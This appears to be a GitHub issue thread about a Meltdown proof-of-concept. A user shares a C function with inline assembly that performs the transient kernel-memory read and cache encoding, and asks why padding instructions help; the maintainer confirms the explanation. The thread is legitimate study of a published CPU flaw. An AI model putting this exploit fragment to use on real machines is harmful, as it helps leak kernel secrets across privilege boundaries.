Confusion about part of the assembly code.

[howardzhang87]

I have managed to get rid of the assembly code and using C code to trigger meltdown, but I still need part of the assembly code you wrote which is not directly related to Meltdown to make this work. See my code below:

void meltdown_asm(unsigned long kernel_data_addr)
{
   char kernel_data = 0;
   
   // ??? give the algorithmic units something to chew
   asm volatile(
       ".rept 400;"              
       "add $0x141, %%eax;"
       ".endr;"
                 
       :
       :
       : "eax"
   ); 
    
   kernel_data = *(char*)kernel_data_addr;  
   array[kernel_data * 4096] += 83;              
}

The kernel data is in the cache. I have done some experiments and found out the inline assembly code that keeps EAX busy is critical. In another issue post, you said:"give the algorithmic units something to chew while memory access is being speculated". In my understanding, while CPU executing the dummy asm code, since the memory fetching units are idle, they would out-of-orderly fetch the kernel data ahead, which increase the possibility of success. Is my understanding correct? Many thanks!

My setup is Ubuntu 16.04 32bit VM running on i7-6600u.

[paboldin]

Is my understanding correct

Yes, it seems like this. The best-working sequence is architecture-dependent, new paper looks for them automatically: https://arxiv.org/abs/1802.03802